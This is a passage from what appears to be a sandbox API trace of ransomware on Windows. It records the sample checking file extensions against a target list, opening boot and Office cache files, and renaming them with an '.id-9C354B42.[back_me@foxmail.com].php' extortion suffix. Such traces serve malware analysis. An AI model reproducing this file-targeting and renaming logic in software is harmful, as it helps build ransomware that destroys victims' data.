(lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.231] lstrlenW (lpString=".1cd") returned 4 [0035.231] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0035.231] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.231] lstrlenW (lpString=".jpg") returned 4 [0035.231] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0035.231] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.231] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.231] lstrlenW (lpString=".doc") returned 4 [0035.231] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0035.231] lstrlenW (lpString=".docx") returned 5 [0035.231] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0035.232] lstrlenW (lpString=".pdf") returned 4 [0035.232] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0035.232] lstrlenW (lpString=".xls") returned 4 [0035.232] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0035.232] lstrlenW (lpString=".xlsx") returned 5 [0035.232] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0035.232] lstrlenW (lpString=".ppt") returned 4 [0035.232] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0035.232] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.232] lstrlenW (lpString=".zip") returned 4 [0035.232] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0035.232] lstrlenW (lpString=".rar") returned 4 [0035.232] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0035.232] lstrlenW (lpString=".bz2") returned 4 [0035.232] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0035.232] lstrlenW (lpString=".7z") returned 3 [0035.232] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0035.232] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.232] lstrlenW (lpString=".dbf") returned 4 [0035.232] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0035.232] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.232] lstrlenW (lpString=".1cd") returned 4 [0035.232] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0035.232] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0035.232] lstrlenW (lpString=".jpg") returned 4 [0035.232] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0035.232] lstrcmpiW (lpString1=".LOG2", lpString2=".php") returned -1 [0035.232] lstrlenW (lpString="BCD.LOG2") returned 8 [0035.233] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.233] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=0) returned 1 [0035.233] CloseHandle (hObject=0x1a4) returned 1 [0035.233] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.233] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.233] lstrlenW (lpString=".doc") returned 4 [0035.233] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0035.233] lstrlenW (lpString=".docx") returned 5 [0035.233] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0035.233] lstrlenW (lpString=".pdf") returned 4 [0035.233] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0035.233] lstrlenW (lpString=".xls") returned 4 [0035.233] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0035.233] lstrlenW (lpString=".xlsx") returned 5 [0035.233] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0035.233] lstrlenW (lpString=".ppt") returned 4 [0035.233] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0035.233] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.233] lstrlenW (lpString=".zip") returned 4 [0035.233] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0035.233] lstrlenW (lpString=".rar") returned 4 [0035.233] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0035.233] lstrlenW (lpString=".bz2") returned 4 [0035.233] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0035.234] lstrlenW (lpString=".7z") returned 3 [0035.234] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0035.234] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.234] lstrlenW (lpString=".dbf") returned 4 [0035.234] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0035.234] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.234] lstrlenW (lpString=".1cd") returned 4 [0035.234] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0035.234] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.234] lstrlenW (lpString=".jpg") returned 4 [0035.234] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0035.234] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.234] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.234] lstrlenW (lpString=".doc") returned 4 [0035.234] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0035.234] lstrlenW (lpString=".docx") returned 5 [0035.234] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0035.234] lstrlenW (lpString=".pdf") returned 4 [0035.234] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0035.234] lstrlenW (lpString=".xls") returned 4 [0035.234] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0035.234] lstrlenW (lpString=".xlsx") returned 5 [0035.234] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0035.234] lstrlenW (lpString=".ppt") returned 4 [0035.234] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0035.234] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.234] lstrlenW (lpString=".zip") returned 4 [0035.234] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0035.234] lstrlenW (lpString=".rar") returned 4 [0035.234] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0035.234] lstrlenW (lpString=".bz2") returned 4 [0035.234] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0035.235] lstrlenW (lpString=".7z") returned 3 [0035.235] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0035.235] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.235] lstrlenW (lpString=".dbf") returned 4 [0035.235] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0035.235] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.235] lstrlenW (lpString=".1cd") returned 4 [0035.235] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0035.235] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.235] lstrlenW (lpString=".jpg") returned 4 [0035.235] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0035.235] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0035.235] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.235] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.235] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=89168) returned 1 [0035.235] CloseHandle (hObject=0x1a4) returned 1 [0035.235] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0035.235] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.236] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.236] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.236] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.236] lstrlenW (lpString=".doc") returned 4 [0035.236] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.236] lstrlenW (lpString=".docx") returned 5 [0035.236] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.236] lstrlenW (lpString=".pdf") returned 4 [0035.236] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.236] lstrlenW (lpString=".xls") returned 4 [0035.236] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.236] lstrlenW (lpString=".xlsx") returned 5 [0035.236] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.236] lstrlenW (lpString=".ppt") returned 4 [0035.236] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.236] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.236] lstrlenW (lpString=".zip") returned 4 [0035.236] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.236] lstrlenW (lpString=".rar") returned 4 [0035.236] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.236] lstrlenW (lpString=".bz2") returned 4 [0035.236] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.236] lstrlenW (lpString=".7z") returned 3 [0035.236] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.236] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.236] lstrlenW (lpString=".dbf") returned 4 [0035.236] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.236] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.236] lstrlenW (lpString=".1cd") returned 4 [0035.236] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.236] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.237] lstrlenW (lpString=".jpg") returned 4 [0035.237] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.237] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.237] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.237] lstrlenW (lpString=".doc") returned 4 [0035.237] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.237] lstrlenW (lpString=".docx") returned 5 [0035.237] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.237] lstrlenW (lpString=".pdf") returned 4 [0035.237] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.237] lstrlenW (lpString=".xls") returned 4 [0035.237] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.237] lstrlenW (lpString=".xlsx") returned 5 [0035.237] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.237] lstrlenW (lpString=".ppt") returned 4 [0035.237] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.237] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.237] lstrlenW (lpString=".zip") returned 4 [0035.237] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.237] lstrlenW (lpString=".rar") returned 4 [0035.237] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.237] lstrlenW (lpString=".bz2") returned 4 [0035.237] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.237] lstrlenW (lpString=".7z") returned 3 [0035.237] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.237] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.237] lstrlenW (lpString=".dbf") returned 4 [0035.237] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.237] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.237] lstrlenW (lpString=".1cd") returned 4 [0035.237] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.237] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.238] lstrlenW (lpString=".jpg") returned 4 [0035.238] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.238] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0035.238] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.238] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.238] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=87616) returned 1 [0035.238] CloseHandle (hObject=0x1a4) returned 1 [0035.238] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0035.238] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.238] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.238] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.238] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.238] lstrlenW (lpString=".doc") returned 4 [0035.238] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.238] lstrlenW (lpString=".docx") returned 5 [0035.238] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.239] lstrlenW (lpString=".pdf") returned 4 [0035.239] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.239] lstrlenW (lpString=".xls") returned 4 [0035.239] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.239] lstrlenW (lpString=".xlsx") returned 5 [0035.239] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.239] lstrlenW (lpString=".ppt") returned 4 [0035.239] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.239] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.239] lstrlenW (lpString=".zip") returned 4 [0035.239] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.239] lstrlenW (lpString=".rar") returned 4 [0035.239] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.239] lstrlenW (lpString=".bz2") returned 4 [0035.239] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.239] lstrlenW (lpString=".7z") returned 3 [0035.239] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.239] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.239] lstrlenW (lpString=".dbf") returned 4 [0035.239] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.239] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.239] lstrlenW (lpString=".1cd") returned 4 [0035.239] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.239] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.239] lstrlenW (lpString=".jpg") returned 4 [0035.239] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.239] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.239] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.239] lstrlenW (lpString=".doc") returned 4 [0035.239] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.239] lstrlenW (lpString=".docx") returned 5 [0035.239] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.240] lstrlenW (lpString=".pdf") returned 4 [0035.240] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.240] lstrlenW (lpString=".xls") returned 4 [0035.240] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.240] lstrlenW (lpString=".xlsx") returned 5 [0035.240] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.240] lstrlenW (lpString=".ppt") returned 4 [0035.240] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.240] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.240] lstrlenW (lpString=".zip") returned 4 [0035.240] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.240] lstrlenW (lpString=".rar") returned 4 [0035.240] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.240] lstrlenW (lpString=".bz2") returned 4 [0035.240] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.240] lstrlenW (lpString=".7z") returned 3 [0035.240] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.240] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.240] lstrlenW (lpString=".dbf") returned 4 [0035.240] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.240] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.240] lstrlenW (lpString=".1cd") returned 4 [0035.240] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.240] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.240] lstrlenW (lpString=".jpg") returned 4 [0035.240] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.240] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0035.240] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.241] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.242] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=91712) returned 1 [0035.242] CloseHandle (hObject=0x1a4) returned 1 [0035.242] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0035.242] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.242] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.242] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.242] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.243] lstrlenW (lpString=".doc") returned 4 [0035.243] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.243] lstrlenW (lpString=".docx") returned 5 [0035.243] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.243] lstrlenW (lpString=".pdf") returned 4 [0035.243] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.243] lstrlenW (lpString=".xls") returned 4 [0035.243] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.243] lstrlenW (lpString=".xlsx") returned 5 [0035.243] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.243] lstrlenW (lpString=".ppt") returned 4 [0035.243] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.243] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.243] lstrlenW (lpString=".zip") returned 4 [0035.243] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.243] lstrlenW (lpString=".rar") returned 4 [0035.243] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.243] lstrlenW (lpString=".bz2") returned 4 [0035.243] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.243] lstrlenW (lpString=".7z") returned 3 [0035.243] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.243] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.243] lstrlenW (lpString=".dbf") returned 4 [0035.243] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.243] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.243] lstrlenW (lpString=".1cd") returned 4 [0035.243] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.243] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.243] lstrlenW (lpString=".jpg") returned 4 [0035.243] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.243] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.243] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.244] lstrlenW (lpString=".doc") returned 4 [0035.244] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.244] lstrlenW (lpString=".docx") returned 5 [0035.244] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.244] lstrlenW (lpString=".pdf") returned 4 [0035.244] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.244] lstrlenW (lpString=".xls") returned 4 [0035.244] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.244] lstrlenW (lpString=".xlsx") returned 5 [0035.244] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.244] lstrlenW (lpString=".ppt") returned 4 [0035.244] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.244] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.244] lstrlenW (lpString=".zip") returned 4 [0035.244] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.244] lstrlenW (lpString=".rar") returned 4 [0035.244] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.244] lstrlenW (lpString=".bz2") returned 4 [0035.244] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.244] lstrlenW (lpString=".7z") returned 3 [0035.244] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.244] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.244] lstrlenW (lpString=".dbf") returned 4 [0035.244] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.244] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.244] lstrlenW (lpString=".1cd") returned 4 [0035.244] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.244] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.244] lstrlenW (lpString=".jpg") returned 4 [0035.244] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.245] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0035.245] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.245] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.245] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=94800) returned 1 [0035.245] CloseHandle (hObject=0x1a4) returned 1 [0035.245] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0035.245] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.245] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.245] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0035.245] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0035.245] lstrlenW (lpString=".doc") returned 4 [0035.245] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.245] lstrlenW (lpString=".docx") returned 5 [0035.245] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.245] lstrlenW (lpString=".pdf") returned 4 [0035.245] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.245] lstrlenW (lpString=".xls") returned 4 [0035.245] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.245] lstrlenW (lpString=".xlsx") returned 5 [0035.245] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.246] lstrlenW (lpString=".ppt") returned 4 [0035.246] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.246] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0035.246] lstrlenW (lpString=".zip") returned 4 [0035.246] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.246] lstrlenW (lpString=".rar") returned 4 [0035.246] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.246] lstrlenW (lpString=".bz2") returned 4 [0035.246] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.246] lstrlenW (lpString=".7z") returned 3 [0035.246] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.247] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0035.681] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0035.681] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all 